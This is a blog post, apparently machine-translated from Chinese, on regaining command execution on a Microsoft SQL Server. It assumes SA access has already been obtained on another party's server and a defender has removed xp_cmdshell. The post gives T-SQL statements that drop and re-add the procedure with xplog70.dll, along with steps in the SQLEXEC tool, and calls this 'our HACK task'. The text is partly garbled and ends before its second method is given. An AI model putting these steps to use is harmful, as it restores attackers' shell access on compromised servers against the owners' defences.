When you need to use these things recently, I find that I have a bit not clear, this is really nothing. No way, I have to summarize it on my own blog. The process of using the SQLEXEC plus administrator here is not involved.
Prerequisites Require tools: SQL Query Analyzer and SQLEXEC SUNX VERSION
first part:
Summary of analytical summary about removing xp_cmdshells:
First know the statement:
1. The way to remove the XP_cmdshell extension process is to use the following statement:
if exists (select * from dbo.sysobjects where id = object_id (N '[dbo]. [xpcmdshell]') and OBJECTPROPERTY (id, N'IsExtendedProc ') = 1)
exec sp_dropextendedproc N' [dbo]. [ XP_cmdshell] '
2. The way to add the XP_cmdshell extension process is to use the following statement:
sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'
Now look at the phenomenon:
After obtaining SA permissions, the remote command is executed with SQLEXEC, which appears SQL_ERROR, then it is likely to remove XP_cmdshell.
Now let's take a look at two ways to recover after the XP_cmdshell:
Method 1. Use SQL Query Analyzer to connect to the other party directly, it is very convenient
sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'
Method 2, using SQLEXEC SUNX VERSION
First fill in the% s in the Format option of SQLEXEC SUNX Version, enter in the CMD option
sp_addextendedProc 'XP_cmdshell', 'XPSQL70.DLL'
Or use SQL2000 in the case of SQL2000
Sp_addextendedProc 'XP_cmdshell', 'XPLog70.dll'
Also use SQLEXEC Sunx Version to remove XP_cmdshell method
Select the conditions as the following, then enter
sp_dropextendedProc 'XP_cmdshell'
You can
the second part:
If the other party has removed XPLog70.dll or changed, let's continue our HACK task with the following method:
When there is a phenomenon, it is impossible to delete or change the name of XPLog70.dll.
Write in the query analyzer
sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'
prompt
Objects called 'XP_cmdshell' in the database
So how do we recover?
In fact, in accordance with the method provided by the master LCX, we can implement it in writing scripts in the query analyzer.
